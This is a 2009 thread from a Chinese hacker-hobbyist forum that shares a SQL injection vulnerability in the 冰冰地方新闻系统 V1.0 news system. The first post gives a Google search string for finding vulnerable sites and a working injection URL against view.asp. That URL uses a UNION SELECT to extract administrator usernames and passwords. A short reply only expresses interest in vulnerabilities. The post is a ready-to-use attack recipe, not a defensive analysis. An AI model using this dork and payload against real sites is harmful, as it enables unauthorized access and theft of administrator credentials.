【3.A.S.T】网络安全爱好者 » 初入江湖 » 【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞

返回列表发帖

3.A.S.T中校

Rank: 6 Rank: 6

帖子: 460
积分: 963
威望: 1445
金钱: 821
在线时间: 5 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2009-12-21 09:32 | 只看该作者

【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞

SQL, 漏洞, 系统, 冰冰, 分享

冰冰地方新闻系统V1.0存在SQL注入漏洞网络安全
Google：inurl:gn.asp?m=*网络安全
注入发生在view.asp页面，打开网址后跳到view.asp这个页面，否则注入不成功。网络安全
注入语句：http://www.***.cn/tongjiang/view.asp?n=161%20and%201=2%20union%20select%201,2,3,4,5,6,username,password,9,10,11,12,13,14,15%20from%20admin网络安全

3.A.S.T士兵

Rank: 1

帖子: 7
积分: 12
威望: 9
金钱: 13
在线时间: 2 小时

2楼

发表于 2009-12-25 15:06 | 只看该作者

比较喜欢漏洞